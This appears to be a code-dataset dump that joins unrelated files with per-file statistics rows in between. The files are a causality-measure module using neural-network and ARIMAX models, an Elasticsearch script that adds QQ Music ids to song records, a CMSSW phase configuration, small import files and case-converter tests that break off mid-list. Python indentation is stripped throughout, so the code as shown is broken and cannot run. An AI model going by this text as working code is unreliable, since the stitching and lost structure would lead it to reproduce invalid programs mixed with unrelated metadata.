plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_xtest - boolean, if True data from xtest are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityNN() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
# Checking the test data correctness
if type(xtest) is np.ndarray:
if xtest.shape[1] !=x.shape[1]:
raise Exception('xtest should have the same number of columns as x.')
elif True in np.isnan(xtest):
raise ValueError('There is some NaN in xtest.')
elif True in np.isinf(xtest):
raise ValueError('There is some infinity value in xtest.')
elif xtest==[]:
xtest=x
else:
raise TypeError('xtest should be numpy ndarray, or [].')
xx = np.zeros([x.shape[0],2])
xxtest = np.zeros([xtest.shape[0],2])
results = dict()
length = xtest.shape[0]
for i in range(x.shape[1]):
for j in range(x.shape[1]):
if i==j:
continue
else:
xx[:,0] = x[:,i] # Choosing the time series that will be examined in this iteration
xx[:,1] = x[:,j]
xxtest[:,0] = xtest[:,i] # Choosing corresponding test time series
xxtest[:,1] = xtest[:,j]
print(str(j)+'->'+str(i))
res = nonlincausalityNN(xx, maxlag, NN_config, NN_neurons, run, xxtest, z, ztest, epochs_num, learning_rate, batch_size_num, verbose, plot)
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags:
idx_bestX = res[lag][0][-4]
idx_bestXY = res[lag][0][-3]
modelsX = res[lag][0][1]
modelsXY = res[lag][0][2]
modelX = modelsX[idx_bestX]
modelXY = modelsXY[idx_bestXY]
X = xxtest[lag:,0] # signal that will be forecast
# test data for model based only on X (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest[:,0].reshape(xxtest.shape[0],1)),axis=1)
dataXtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model only with data from the X time series
for k in range(length-lag):
dataXtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXtest = np.zeros([xxtest.shape[0]-lag,lag]) # input matrix for testing the model only with data from X time series
for k in range(xxtest.shape[0]-lag):
dataXtest[k,:]=xxtest[k:k+lag,0] # each row is lag number of values before the value in corresponding row in X
dataXtest = dataXtest.reshape(dataXtest.shape[0],dataXtest.shape[1],1) # reshaping the data to meet the requirements of the model
# test data for the model based on X and Y (and z if set)
if z!=[]:
xztest= np.concatenate((ztest,xxtest),axis=1)
dataXYtest = np.zeros([xztest.shape[0]-lag,lag,xztest.shape[1]]) # input matrix for testing the model with data from the X and Y time series
for k in range(length-lag):
dataXYtest[k,:,:]=xztest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
else:
dataXYtest = np.zeros([xxtest.shape[0]-lag,lag,2]) # input matrix for testing the model with data from X and Y time series
for k in range(xxtest.shape[0]-lag):
dataXYtest[k,:,:]=xxtest[k:k+lag,:] # each row is lag number of values before the value in corresponding row in X
#dataXYtest = dataXYtest.reshape(dataXYtest.shape[0],dataXYtest.shape[1],2) # reshaping the data to meet the requirements of the model
XpredX = modelX.predict(dataXtest) # prediction of X based on past of X
XpredX = XpredX.reshape(XpredX.size)
errorX = X-XpredX
XYpredX = modelXY.predict(dataXYtest) # forecasting X based on the past of X and Y
XYpredX = XYpredX.reshape(XYpredX.size)
errorXY = X-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(w1,T,w2)): # computing the value of causality starting from moment w1 with a step equal to w2 till the end of the time series
VC[n] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[k-w1:k]**2))/np.sqrt(np.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k-w1
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + np.exp(-(np.sqrt(np.mean(errorX[-w1:]**2))/np.sqrt(np.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T-w1
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+' '+ str(min([i,j]))+' and ' + str(max([i,j])))
plt.plot(VCX, VC)
if j<i and plot_with_xtest:
plt.plot(range(0,T),xxtest[lag:,0],range(0,T),xxtest[lag:,1], alpha=0.5)
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = np.log(np.var(errorX)/np.var(errorXY)) # value of causality for the whole signal
results[str(j)+'->'+str(i)] = ([VC_res, VC2_res, VCX_res, res],['measure of causality with sigmoid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityNN function'])
return results
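# A minimal usage sketch (hypothetical data; all names below are illustrative
# and not part of the original module):
#
#   x = np.random.randn(1000, 2)
#   res = nonlincausalitymeasureNN(x, maxlag=[5], w1=50, w2=25,
#                                  NN_config=['l', 'dr', 'd'],
#                                  NN_neurons=[100, 0.1, 30])
#   vc_windowed = res['1->0'][0][0][5]   # windowed measure for column 1 -> 0
#
# The NN_config/NN_neurons pair above builds an LSTM(100) -> Dropout(0.1) ->
# Dense(30) network, followed by the implicit Dense(1) output layer.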
#%% Measure ARIMAX
def nonlincausalitymeasureARIMAX(x, maxlag, w1, w2, d, xtest=[], z=[], ztest=[], verbose=True, plot = False, plot_res = False, plot_with_x = False):
'''
This function uses a modified Granger causality test to examine mutual causality in 2 or more time series.
It uses the nonlincausalityARIMAX function for creating the prediction models.
A measure of causality is derived from these models as a sigmoid function
2/(1 + e^(-(RMSE1/RMSE2-1)))-1
where
RMSE1 is the root mean square error obtained from the model using only the past of X to predict X,
RMSE2 is the root mean square error obtained from the model using the past of X and Y to predict X.
RMSE is computed over windows of w1 samples, moving with a step of w2.
This function computes mutual causality for every pair of time series contained in the columns of x.
Parameters
----------
x - numpy ndarray, where each column corresponds to one time series.
maxlag - int, list, tuple or numpy ndarray. If maxlag is int, then test for causality is made for lags from 1 to maxlag.
If maxlag is list, tuple or numpy ndarray, then test for causality is made for every number of lags in maxlag.
w1 - int, the window length (number of samples) used to compute the RMSE in the measure of causality.
w2 - int, the step (in samples) between consecutive RMSE windows.
d - int, the order of differencing applied in the ARIMA models.
xtest - numpy ndarray (or [] if not applied), test data with the same layout as x, used for testing the hypothesis.
z - numpy ndarray (or [] if not applied), where each column corresponds to one time series. This variable is used for testing conditional causality.
In this approach, the first model forecasts the present value of X based on past values of X and z, while the second model forecasts the same value based on the past of X, Y and z.
ztest - numpy ndarray (or [] if not applied), test data with the same layout as z, used for testing the hypothesis.
verbose - boolean, if True, then results are shown after each lag.
plot - boolean, if True plots of original and predicted values are made after each lag.
plot_res - boolean, if True plots of results (causality measures) are made.
plot_with_x - boolean, if True data from x are plotted on the same figure as the results.
Returns
-------
results - dictionary, where "number of one column -> number of another column" (eg. "0->1") are keys.
Each key stores a list, which contains measures of causality, numbers of samples at the end of the step and results from nonlincausalityARIMAX() function.
'''
# Checking the data correctness
if type(x) is np.ndarray:
if np.array(x.shape).shape[0] !=2:
raise Exception('x has wrong shape.')
elif x.shape[1] == 1:
raise Exception('x should have at least 2 columns.')
elif True in np.isnan(x):
raise ValueError('There is some NaN in x.')
elif True in np.isinf(x):
raise ValueError('There is some infinity value in x.')
else:
raise TypeError('x should be numpy ndarray.')
# Checking if maxlag has correct type and values
if type(maxlag) is list or type(maxlag) is np.ndarray or type(maxlag) is tuple:
lags = maxlag
for lag in lags:
if type(lag) is not int:
raise ValueError('Every element in maxlag should be an integer.')
elif lag<=0:
raise ValueError('Every element in maxlag should be a positive integer.')
elif type(maxlag) is int:
if maxlag>0:
lags = range(1,maxlag+1)
else:
raise ValueError('maxlag should be greater than 0.')
else:
raise TypeError('maxlag should be int, list, tuple or numpy ndarray.')
xx = np.zeros([x.shape[0],2])
results = dict()
for i in range(x.shape[1]): # In terms of testing Y->X, this loop is responsible for choosing Y
for j in range(x.shape[1]): # This one is responsible for choosing X
if i==j:
continue # not to calculate causality for X->X
else:
xx[:,0] = x[:,i] # Choosing the time series that will be examined in this iteration
xx[:,1] = x[:,j]
print(str(i)+'->'+str(j))
res = nonlincausalityARIMAX(xx, maxlag, d, xtest, z, ztest, plot) # creating model using only past of X, and model using past of X and Y
VC_res = dict()
VC2_res = dict()
VCX_res = dict()
for lag in lags: # counting change of causality for every lag
modelX = res[lag][0][1] # model using only past of X
modelXY = res[lag][0][2] # model using past of X and Y
X = xx[:,0]
XpredX = modelX.predict(typ='levels') # predicted values
XYpredX = modelXY.predict(typ='levels')
errorX = X[1:]-XpredX
errorXY = X[1:]-XYpredX
T = X.size
VC = np.ones([int(np.ceil((T)/w2))]) # initializing variable for the causality measure
VCX = np.ones([int(np.ceil((T)/w2))]) # initializing variable for numbers of samples at the end of each step
all1 = False
for n, k in enumerate(range(w1,T,w2)): # counting value of causality starting from moment w1 with step equal to w2 till the end of time series
VC[n] = 2/(1 + math.exp(-(math.sqrt(statistics.mean(errorX[k-w1:k]**2))/math.sqrt(statistics.mean(errorXY[k-w1:k]**2))-1)))-1 # value of causality as a sigmoid function of quotient of errors
VCX[n] = k
if VC[n]<0: # if performance of modelX was better than performance of modelXY
VC[n] = 0 # that means there is no causality
if X[k]==X[-1]: # if the causality of the whole range of time series was calculated
all1=True # there is no need for further calculations
if all1==False: # otherwise calculations must be done for the end of the signal
VC[-1] = 2/(1 + math.exp(-(math.sqrt(statistics.mean(errorX[-w1:]**2))/math.sqrt(statistics.mean(errorXY[-w1:]**2))-1)))-1
VCX[-1] = T
if VC[-1]<0:
VC[-1] = 0
print('i = ' +str(i)+', j = '+str(j)+', lag = '+str(lag))
if plot_res:
plt.figure('lag '+str(lag)+'_'+ str(min([i,j]))+' and ' + str(max([i,j])) +' sigmoid function of quotient of errors')
plt.plot(VCX, VC)
if j<i and plot_with_x:
plt.plot(range(0,T),xx[0:,0],range(0,T),xx[0:,1])
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i),str(i),str(j)])
elif j<i:
plt.legend([str(i)+'->'+str(j),str(j)+'->'+str(i)])
VCX_res[lag] = VCX
VC_res[lag] = VC
VC2_res[lag] = math.log(statistics.variance(errorX)/statistics.variance(errorXY)) # value of causality for the whole signal
results[str(i)+'->'+str(j)] = ([VC_res, VC2_res, VCX_res, res],['measure of causality with sigmoid function', 'measure of causality with logarithm','numbers of samples at the end of the step','results from nonlincausalityARIMAX function'])
return results | 57.058261 | 302 | 0.611556 | 18,937 | 131,234 | 4.186038 | 0.027143 | 0.018569 | 0.00492 | 0.013851 | 0.939347 | 0.93063 | 0.921825 | 0.915745 | 0.912881 | 0.90588 | 0 | 0.011258 | 0.296105 | 131,234 | 2,300 | 303 | 57.058261 | 0.846885 | 0.326798 | 0 | 0.863362 | 0 | 0.00067 | 0.167943 | 0.000249 | 0 | 0 | 0 | 0.000435 | 0 | 1 | 0.005358 | false | 0 | 0.006698 | 0 | 0.017415 | 0.009377 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6261c8cccefc46cd3326231f28bd7e62da3de91 | 4,780 | py | Python | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | luoo_init/es_qq.py | Cothrax/luoo_project | 5bc012740ba0eccff8d2589bb83eddbb6e520502 | [
"MIT"
] | null | null | null | from luoo_init.utils.qqmusic import QQMusicAPI
from elasticsearch import Elasticsearch
client = Elasticsearch(hosts=['144.34.156.145'], timeout=20)
def insert_qq(gte, lte, max_tries=5):
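'''Look up QQ Music ids for every piece of vols in [gte, lte] from the
'luoo1' index, store the best match as (qq_id, qq_sim) on each piece and
write the document back, retrying a failed update up to max_tries times.'''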
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
for i in range(len(pieces)):
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
qq_id, qq_sim = api.get_id(title, artist, album, if_check=True)
pieces[i]['qq_id'] = qq_id
pieces[i]['qq_sim'] = qq_sim
print('%s %s %s: %s %s' % (title, album, artist, api.get_page_url(qq_id), qq_sim))
tries = 0
while True:
try:
client.update(
index='luoo1',
id=obj_id,
body={'doc': {'pieces': pieces}}
)
break
except Exception as e:
tries += 1
if tries == max_tries:
raise e
def insert_qq_again(gte, lte, max_tries=5):
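'''Re-run the QQ Music lookup for pieces whose current best match is weak
(both qq_sim and ne_sim below 0.75), keeping the new id only when it scores
higher than the stored qq_sim.'''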
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
count = 0
for i in range(len(pieces)):
if pieces[i].get('qq_sim', 0) >= 0.75:
continue
if pieces[i].get('ne_sim', 0) >= 0.75:
continue
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
qq_id, qq_sim = api.get_id(title, artist, album, if_check=True)
if qq_sim > pieces[i].get('qq_sim', 0):
pieces[i]['qq_id'] = qq_id
pieces[i]['qq_sim'] = qq_sim
print('%s %s %s: %s %s' % (title, album, artist, api.get_page_url(qq_id), qq_sim))
count += 1
if not count:
continue
tries = 0
while True:
try:
client.update(
index='luoo1',
id=obj_id,
body={'doc': {'pieces': pieces}}
)
break
except Exception as e:
tries += 1
if tries == max_tries:
raise e
def miss_stat(gte, lte):
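'''Print every piece of vols in [gte, lte] that still lacks a confident
match (qq_sim < 0.70 and ne_sim <= 0.70) and tally them in the module-level
count variable.'''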
api = QQMusicAPI()
query_body = {
'range': {
'id': {
'gte': gte,
'lte': lte
}
}
}
response = client.search(index='luoo1', body={'size': lte - gte + 1, "sort": ["id"], 'query': query_body})
# print('total: ', len(response['hits']['hits']))
for vol in response['hits']['hits']:
obj_id = vol['_id']
print('vol. ', vol['_source']['id'])
if 'pieces' not in vol['_source']:
continue
pieces = vol['_source']['pieces']
# count = 0
for i in range(len(pieces)):
if pieces[i].get('qq_sim', 0) < 0.70 and pieces[i].get('ne_sim', 0) <= 0.70:
title = pieces[i]['title']
album = pieces[i]['album']
artist = pieces[i]['artist']
print('%s: %s, %s, %s, %s: %s, %s: %s' % (pieces[i]['id'], title, album, artist,
pieces[i].get('qq_id', None), pieces[i].get('qq_sim', 0),
pieces[i].get('ne_id', None), pieces[i].get('ne_sim', 0)))
global count
count += 1
count = 0
if __name__ == '__main__':
# insert_qq(901, 1000)
# bp = [0, 100, 200, 300, 400, 500, 600, 700, 750]
# for l, r in zip(bp, bp[1:]):
# insert_qq_again(l+1, r)
# insert_qq_again(751, 800)
bp = list(range(0, 1100, 100))
for l, r in zip(bp, bp[1:]):
miss_stat(l, r)
print('total: ', count)
| 31.038961 | 110 | 0.447699 | 568 | 4,780 | 3.626761 | 0.177817 | 0.078155 | 0.017476 | 0.017476 | 0.808738 | 0.793204 | 0.773301 | 0.752913 | 0.719417 | 0.719417 | 0 | 0.034223 | 0.388703 | 4,780 | 153 | 111 | 31.24183 | 0.670773 | 0.043933 | 0 | 0.747967 | 0 | 0.00813 | 0.114743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.01626 | 0 | 0.04065 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c62b2ec776685e4ae7f491f3a5a4c6eaa782f43e | 107 | py | Python | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 421 | 2019-04-17T01:52:40.000Z | 2022-03-23T09:42:54.000Z | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 45 | 2019-04-19T02:35:53.000Z | 2022-02-15T10:18:17.000Z | models/__init__.py | v-wewei/Relation-Shape-CNN | 04c114d6eaf981736721f0013dab4fc3c91ae05f | [
"MIT"
] | 84 | 2019-04-17T16:20:45.000Z | 2022-03-29T07:55:18.000Z | from .rscnn_ssn_cls import RSCNN_SSN as RSCNN_SSN_Cls
from .rscnn_msn_seg import RSCNN_MSN as RSCNN_MSN_Seg | 53.5 | 53 | 0.878505 | 22 | 107 | 3.818182 | 0.363636 | 0.285714 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102804 | 107 | 2 | 54 | 53.5 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c63416b41c3122f5ff44d89195836e332cca830e | 153 | py | Python | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | func_packages/Snowboy/main.py | zhetengtiao/RingRobotX | 59daa1ec1ebcaa2285a43bc947fbb201577e1cbf | [
"Apache-2.0"
] | null | null | null | import model.hook
import func_packages.Snowboy.snowboymain
model.hook.add_hook_fast("RRCore.Main.Before.Running",func_packages.Snowboy.snowboymain.run)
| 30.6 | 92 | 0.856209 | 22 | 153 | 5.772727 | 0.636364 | 0.141732 | 0.299213 | 0.472441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039216 | 153 | 4 | 93 | 38.25 | 0.863946 | 0 | 0 | 0 | 0 | 0 | 0.169935 | 0.169935 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c658e25525cb1225ebec1eee2a924886e523781d | 2,781 | py | Python | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | DPGAnalysis/SiStripTools/python/configurableapvcyclephaseproducer_GR09_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
APVPhases = cms.EDProducer('ConfigurableAPVCyclePhaseProducer',
defaultPartitionNames = cms.vstring("TI_13-JUN-2009_1",
"TO_30-JUN-2009_1",
"TP_09-JUN-2009_1",
"TM_09-JUN-2009_1"
),
defaultPhases = cms.vint32(-1,-1,-1,-1),
runPhases = cms.VPSet(
cms.PSet( runNumber = cms.int32(100967),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(100995),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101012),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101018),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101043),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(101045),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(102130),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(102169),phases = cms.untracked.vint32(30),partitions = cms.untracked.vstring("TM_09-JUN-2009_1")),
cms.PSet( runNumber = cms.int32(105612),phases = cms.untracked.vint32(-1,-1,-1,-1)),
cms.PSet( runNumber = cms.int32(105755),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(105765),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(105820),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(106019),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(108219),phases = cms.untracked.vint32(30,30,30,30)),
cms.PSet( runNumber = cms.int32(108239),phases = cms.untracked.vint32(30,30,30,30))
)
)
| 99.321429 | 161 | 0.518519 | 301 | 2,781 | 4.710963 | 0.152824 | 0.19464 | 0.169252 | 0.200987 | 0.789845 | 0.751058 | 0.733427 | 0.733427 | 0.71086 | 0.71086 | 0 | 0.170637 | 0.350953 | 2,781 | 27 | 162 | 103 | 0.614958 | 0 | 0 | 0 | 0 | 0 | 0.080906 | 0.011866 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d67085db6dc31bc519b807f85c23c4d0d9e05ff6 | 101 | py | Python | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | 1 | 2016-04-03T13:31:39.000Z | 2016-04-03T16:48:26.000Z | res_mods/configs/xvm/py_macro/str.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | @xvm.export('replace')
def str_replace(str, old, new, max=-1):
return str.replace(old, new, max)
| 25.25 | 39 | 0.673267 | 17 | 101 | 3.941176 | 0.588235 | 0.298507 | 0.268657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.138614 | 101 | 3 | 40 | 33.666667 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0.069307 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d69be239e8d08f7f57cbcee6c179421233bd9898 | 7,959 | py | Python | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | 8 | 2021-01-14T20:08:14.000Z | 2022-03-08T12:08:24.000Z | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | 5 | 2021-09-06T23:23:23.000Z | 2022-03-29T12:08:28.000Z | caseconverter/caseconverter_test.py | chrisdoherty4/python-case-converter | fc513efd069848cf5cc9323a98b0b4ee6171ca5e | [
"MIT"
] | null | null | null | import pytest
from .caseconverter import *
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "helloWorld"),
# Camel cased
("helloWorld", "helloWorld"),
# Joined by delimeter.
("Hello-World", "helloWorld"),
# Cobol cased
("HELLO-WORLD", "helloWorld"),
# Without punctuation.
("Hello world", "helloWorld"),
# Repeating single delimeter
("Hello World", "helloWorld"),
# Repeating delimeters of different types
("Hello -__ World", "helloWorld"),
# Wrapped in delimeter
(" hello world ", "helloWorld"),
# End in capital letter
("hellO", "hellO"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"theQuickBrownFoxJumpedOverTheLaZyDoG",
),
# Alternating character cases
("heLlo WoRld", "heLloWoRld"),
],
)
def test_camel_with_default_args(input, output):
assert camelcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HELLO-WORLD"),
# Camel cased
("helloWorld", "HELLO-WORLD"),
# Joined by delimeter.
("Hello-World", "HELLO-WORLD"),
# Cobol cased
("HELLO-WORLD", "HELLO-WORLD"),
# Without punctuation.
("Hello world", "HELLO-WORLD"),
# Repeating single delimeter
("Hello World", "HELLO-WORLD"),
# Repeating delimeters of different types
("Hello -__ World", "HELLO-WORLD"),
# Wrapped in delimeter
(" hello world ", "HELLO-WORLD"),
# End in capital letter
("hellO", "HELL-O"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"THE-QUICK-BROWN-FOX-JUMPED-OVER-THE-LA-ZY-DO-G",
),
# Alternating character cases
("heLlo WoRld", "HE-LLO-WO-RLD"),
],
)
def test_cobol_with_default_args(input, output):
assert cobolcase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "HELLO_WORLD"),
# Camel cased
("helloWorld", "HELLO_WORLD"),
# Joined by delimeter.
("Hello-World", "HELLO_WORLD"),
# Cobol cased
("HELLO-WORLD", "HELLO_WORLD"),
# Without punctuation.
("Hello world", "HELLO_WORLD"),
# Repeating single delimeter
("Hello World", "HELLO_WORLD"),
# Repeating delimeters of different types
("Hello -__ World", "HELLO_WORLD"),
# Wrapped in delimeter
(" hello world ", "HELLO_WORLD"),
# End in capital letter
("hellO", "HELL_O"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
"THE_QUICK_BROWN_FOX_JUMPED_OVER_THE_LA_ZY_DO_G",
),
# Alternating character cases
("heLlo WoRld", "HE_LLO_WO_RLD"),
],
)
def test_macro_with_default_args(input, output):
assert macrocase(input) == output
@pytest.mark.parametrize(
"input, output",
[
# With punctuation.
("Hello, world!", "hello_world"),
# Camel cased
("helloWorld", "hello_world"),
# Joined by delimeter.
("Hello-World", "hello_world"),
# Cobol cased
("HELLO-WORLD", "hello_world"),
# Without punctuation.
("Hello world", "hello_world"),
# Repeating single delimeter
("Hello World", "hello_world"),
# Repeating delimeters of different types
("Hello -__ World", "hello_world"),
# Wrapped in delimeter
(" hello world ", "hello_world"),
# End in capital letter
("hellO", "hell_o"),
# Long sentence with punctuation
(
r"the quick !b@rown fo%x jumped over the laZy Do'G",
